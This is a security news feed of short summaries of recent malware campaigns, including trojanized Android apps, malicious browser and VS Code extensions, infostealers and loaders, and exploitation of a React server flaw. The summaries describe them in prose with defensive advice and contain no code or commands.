All news with #malware tag

⚠️ Cellik is a new Android malware-as-a-service advertised on underground forums that enables operators to create trojanized copies of legitimate Google Play apps. Attackers can select Play Store apps and build malicious APKs that retain the original UI, potentially helping infections remain unnoticed and, the seller claims, bypass Play Protect. The service, discovered by iVerify, is offered for $150 per month or $900 for lifetime access and includes capabilities such as screen streaming, notification interception, file exfiltration, a hidden browser mode, and an encrypted command-and-control channel.

🕵️ Koi Security identified the GhostPoster campaign that hides JavaScript inside PNG logo images of malicious Firefox extensions, impacting more than 50,000 downloads. The dormant loader waits 48 hours, contacts hardcoded attacker domains and only fetches its payload about 10% of the time to evade detection. The decoded payload provides persistent, high-privilege access and enables affiliate hijacks, analytics injection, header stripping, CAPTCHA bypass and ad/click fraud. Users of flagged extensions should remove them and consider resetting critical account passwords.

🔒 Security researchers have found that the popular Chrome extension Urban VPN Proxy (featured in the Chrome Web Store and used by millions) contained scripts that intercepted AI chat conversations and transmitted them to company-controlled analytics servers. The functionality, introduced in version 5.5.0 on July 9, 2025, allegedly runs regardless of whether the VPN is active and cannot be disabled via settings. Koi's analysis says prompts, responses, timestamps and session identifiers were captured and compressed before exfiltration. The same capability was reportedly present in seven related extensions from the same publisher, potentially affecting more than 8 million users across Chrome and Edge.

🔒 Infoblox researchers found that most parked and typosquatting domains now redirect visitors to scams, scareware, or malware without any user click. The redirects are frequently conditional — benign when accessed via a VPN or non‑residential IP, but malicious for residential addresses — and rely on device fingerprinting, geolocation, and chained resells. The study highlights widespread abuse of expired and lookalike domains and the growing role of affiliate networks in distributing harmful traffic.

⚠️Rapid7 researchers report a new malware-as-a-service called SantaStealer, advertised on Telegram and hacker forums as an in-memory info‑stealer designed to evade file-based detection. The operation appears to be a rebranding of BluelineStealer by a Russian-speaking developer and is being marketed with Basic ($175/month) and Premium ($300/month) tiers. Samples and an affiliate panel show 14 modular data-collection threads that harvest browser credentials, cookies, saved cards, messaging and gaming app data, crypto wallets and documents, bundle results into ZIPs in memory, and exfiltrate them in 10MB chunks to a hardcoded C2 on port 6767. Despite claims of stealth, leaked builds include symbol names and unencrypted strings that make analysis straightforward.

🚨 A Google Chrome extension carrying a "Featured" badge, Urban VPN Proxy, has been found silently harvesting prompts and responses from major AI chat services and sending them to remote analytics servers. The extension — installed by roughly six million Chrome users and about 1.3 million Edge users — was updated on July 9, 2025 (v5.5.0) with AI capture enabled by default. Injected scripts override browser networking APIs to intercept chat data and exfiltrate conversation text, IDs, timestamps, session metadata, and model/platform information. The publisher's updated privacy policy admits collecting AI prompts and outputs for "Safe Browsing" and marketing while disclaiming a full guarantee of de-identification.

🔒 The ShadyPanda campaign hijacked thousands of legitimate Chrome and Edge extensions, converting them into spyware and RCE-enabled backdoors via silent updates. About 4.3 million users installed compromised add‑ons that could steal session cookies and impersonate SaaS accounts. Organizations should enforce extension allow lists, audit permissions, and treat extensions like OAuth apps. Platforms such as Reco can help bridge browser, endpoint, and SaaS visibility.

🛡️ Cybersecurity researchers have disclosed Operation MoneyMount-ISO, a phishing campaign that delivers Phantom Stealer via malicious ISO images attached inside ZIP archives targeting Russian finance, accounting, procurement, legal and payroll teams. The ISO, labeled as a bank transfer confirmation, mounts as a virtual CD and executes an embedded DLL named CreativeAI.dll to launch the stealer. Phantom harvests browser-stored crypto wallets, Discord tokens, passwords, cookies, credit cards, and can log keystrokes and monitor the clipboard. Stolen data is exfiltrated over Telegram, Discord webhooks or FTP.

🛡️ Researchers warn that a wave of malicious GitHub repositories are distributing a newly observed JavaScript-based RAT called PyStoreRAT, delivered via minimal Python/JS loader stubs that fetch and execute remote HTA files through mshta.exe. The deceptive projects — marketed as OSINT utilities, DeFi bots, GPT wrappers, and developer tools — often exhibit non-functional or placeholder interfaces designed to build trust. Once executed, the multi-stage implant can run EXE, DLL, PowerShell, MSI, Python, and HTA modules and deploys a follow-on information stealer, Rhadamanthys. The initial stage also checks for security products such as CrowdStrike and Cybereason to reduce visibility and establishes persistence via a scheduled task masquerading as an NVIDIA update.

🛡️ Bitdefender researchers uncovered a malicious torrent impersonating the new Paul Thomas Anderson film that hides PowerShell loaders inside subtitle files, ultimately delivering the Agent Tesla RAT. A deceptive shortcut (CD.lnk) triggers a PowerShell script embedded between specific subtitle lines to extract AES-encrypted blocks and reconstruct multiple dropper scripts. The complex chain extracts files from included images and the movie file, creates a hidden scheduled task, disables or checks Windows Defender, and loads the final payload in memory, showing a high degree of stealth and persistence.

🛡️ Notepad++ released version 8.8.9 to address a weakness in its WinGUp updater after reports that the updater retrieved and executed malicious binaries instead of legitimate update packages. The issue surfaced in community forums where a spawned %Temp%\AutoUpdater.exe executed reconnaissance commands and exfiltrated data to a public paste service. Version 8.8.9 now enforces code-signature verification for downloaded installers and aborts updates that fail signature checks.

🔍 ReversingLabs discovered a stealthy campaign of 19 malicious VSCode Marketplace extensions that bundled dependencies to run a trojan hidden inside a faux PNG file. The packages included modified 'path-is-absolute' or '@actions/io' modules which auto-execute code via an added class in index.js, decoding an obfuscated JavaScript dropper stored in a file named 'lock'. A fake 'banner.png' archive contained two payloads — a living-off-the-land binary 'cmstp.exe' and a Rust-based trojan — and Microsoft removed the extensions after being notified.

🔍 ReversingLabs uncovered a campaign that embedded malware in 19 Visual Studio Code extensions by tampering with bundled dependencies. Attackers replaced the widely used npm package path-is-absolute to execute a JavaScript dropper from a file named "lock" and hid two binaries inside an archive disguised as banner.png. The payloads were launched via cmstp.exe, including a process-terminating component and a Rust-based Trojan; Microsoft has been notified.

🔔 This week's ThreatsDay Bulletin highlights a packed week of cross-cutting threats: a Mirai variant dubbed Broadside exploiting TBK DVRs (CVE-2024-3721), widespread exploitation of React2Shell (CVE-2025-55182), and the leak of a ValleyRAT builder that includes a signed kernel-mode rootkit. Law enforcement actions ranged from Europol's 193 arrests in a VaaS crackdown to multiple national detentions, while Apple and Google issued broad spyware alerts. Researchers flagged >10,000 Docker Hub images leaking secrets and 19 malicious VS Code extensions that used a PNG disguise to deliver trojans, underscoring persistent supply-chain and user-facing risks.

🔐 Unit 42 details activity by Hamas-affiliated Ashen Lepus using a new modular .NET suite named AshTag, alongside custom loaders and revised C2 techniques to evade detection. The actors targeted Arabic-speaking government and diplomatic entities across the Middle East, delivering malware via RAR archives, DLL sideloading, and payloads hidden in benign HTML. Operators improved encryption and domain masquerading and performed hands-on exfiltration using Rclone. Organizations should monitor the provided IOCs and strengthen EDR and egress controls.

🔒 WIRTE (tracked as Ashen Lepus by Palo Alto Networks) has been observed using benign binaries to sideload a malicious DLL named AshenLoader, which drops additional components to deploy the AshTag .NET backdoor. The intrusion chain begins with a decoy PDF and a RAR archive from file-sharing services, leading to in-memory execution of a stager to minimize forensic traces. Targets are primarily government and diplomatic entities in the Middle East, with recent expansion to Oman and Morocco. Operators have been observed staging diplomacy-related documents and exfiltrating them using Rclone.

🔒 Zimperium researchers uncovered a new Android malware family called DroidLock that locks victims’ screens, steals messages and call data, and can remotely control devices via VNC. The threat targets Spanish-speaking users and is distributed through malicious websites that impersonate legitimate apps and deliver a dropper which installs a secondary payload. The payload requests Device Admin and Accessibility privileges to perform actions such as wiping devices, changing lock credentials, recording audio, starting the camera, and placing overlays that capture lock patterns. Operators serve a ransom WebView directing victims to contact a Proton email and threaten permanent file destruction within 24 hours if unpaid.

⚠ Huntress reports widespread exploitation of the maximum-severity React Server Components flaw CVE-2025-55182, with attackers leveraging vulnerable Next.js instances to deploy cryptocurrency miners and multiple novel Linux malware families. Observed payloads include the PeerBlight backdoor, CowTunnel reverse proxy and ZinFoq post-exploitation implant, alongside droppers that fetch XMRig, Sliver C2 and Kaiji variants. Activity since early December 2025 has targeted many sectors — notably construction and entertainment — and shows signs of automated scanning and exploitation tools that sometimes deploy Linux payloads to Windows hosts. Organizations should update react-server-dom-webpack, react-server-dom-parcel and react-server-dom-turbopack immediately and hunt for indicators of compromise.

⚠️ Researchers observed threat actors distributing the StealC V2 infostealer hidden inside free .blend files on marketplaces like CGTrader. When Blender’s Auto Run Python Scripts setting is enabled, opening these models executes embedded Python that fetches a loader via Cloudflare Workers and runs a PowerShell chain to deploy payloads. The campaign exfiltrated browser and wallet data and abused a UAC bypass. Disable autorun and restrict unvetted tools.

🛡️ Blackpoint researchers have uncovered a campaign that leverages ClickFix social engineering to trick users into running a benign-looking command via the Windows Run dialog. That single action launches a hidden conhost.exe process which fetches a small tar archive, unpacks it into AppData and runs a windowless Python interpreter. The bundled interpreter executes compiled Python bytecode that reconstructs and decrypts CastleLoader shellcode in memory, avoiding disk-based artifacts. Observed staging uses a GoogeBot user agent and familiar /service/download/ paths, linking the activity to the CastleLoader family.